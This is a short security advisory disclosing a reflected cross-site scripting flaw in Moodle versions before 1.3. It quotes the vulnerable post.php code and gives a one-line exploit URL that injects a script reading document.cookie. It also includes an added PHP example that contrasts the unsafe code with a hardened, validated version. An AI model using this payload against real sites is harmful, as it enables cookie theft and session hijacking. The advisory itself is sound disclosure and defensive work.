xss in moodle (post.php)





+--------------------------------+
|                                | 
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Author: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:
~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to 
help educators create quality online courses."
www.moodle.org

Bug:
~~~

Post.php is vulnerable to an XSS attack.
The bug is in the handling of the $reply variable:

/* Begin of vulnerable code */

    } else if (isset($reply)) {      // User is writing a new reply

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }
        if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {
            error("This post is not part of a discussion! ($reply)");
        }
        if (! $forum = get_record("forum", "id", $discussion->forum)) {
            error("The forum number was incorrect ($discussion->forum)");
        }
        if (! $course = get_record("course", "id", $discussion->course)) {
            error("The course number was incorrect ($discussion->course)");
        }

        if (! forum_user_can_post($forum)) {
            error("Sorry, but you can not post in this forum.");
        }

        if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {
            if (groupmode($course, $cm) and !isteacheredit($course->id)) {   // Make sure user can post here
                if (mygroupid($course->id) != $discussion->groupid) {
                    error("Sorry, but you can not post in this discussion.");
                }
            }
            if (!$cm->visible and !isteacher($course->id)) {
                error(get_string("activityiscurrentlyhidden"));
            }
        }

/* End of vulnerable code */

Here is the bug: the value of $reply is echoed into the error message
without escaping:

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Solution: 
~~~~~~~~~
Upgrade to the latest version.
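
The fix pattern for the check shown under "Bug", as an added example that is
not Moodle's code and not part of the original advisory: validate the post ID
as an integer before use and HTML-encode anything echoed into the error page.
error_page() and lookup_post() are hypothetical stand-ins for Moodle's error()
and forum_get_post_full().

```php
<?php
// Added example, not Moodle code. error_page() is a hypothetical stand-in
// for error(); it returns the HTML instead of printing it and exiting.
function error_page(string $message): string {
    return "<div class=\"error\">$message</div>";
}

// Hypothetical stand-in for forum_get_post_full(): only post 42 exists.
function lookup_post($id) {
    return (string)$id === '42' ? (object)['id' => 42] : false;
}

// Pattern from the advisory: the raw request value reaches the HTML output.
function reply_vulnerable($reply): string {
    if (!$parent = lookup_post($reply)) {
        return error_page("Parent post ID was incorrect ($reply)");
    }
    return "reply form for post {$parent->id}";
}

// Hardened form: validate on input, encode on output.
function reply_hardened($reply): string {
    // 1. A post ID is a positive integer; anything else (markup, arrays,
    //    empty strings) is rejected without being echoed back.
    $id = filter_var($reply, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return error_page('Parent post ID was incorrect');
    }
    if (!$parent = lookup_post($id)) {
        // 2. Encode whatever is interpolated into HTML, even a value
        //    already known to be an integer (defence in depth).
        $safe = htmlspecialchars((string)$id, ENT_QUOTES, 'UTF-8');
        return error_page("Parent post ID was incorrect ($safe)");
    }
    return "reply form for post {$parent->id}";
}

// Constructed request values: the decoded payload from the URL above,
// a well-formed ID that does not exist, and a valid ID.
$samples = ['<script>alert(document.cookie);</script>', '9999', '42'];
foreach ($samples as $reply) {
    echo "input:      $reply\n";
    echo "vulnerable: ", reply_vulnerable($reply), "\n";
    echo "hardened:   ", reply_hardened($reply), "\n\n";
}
```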

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits:
~~~~~~~~
Bug found by Javier Ubilla and Ariel.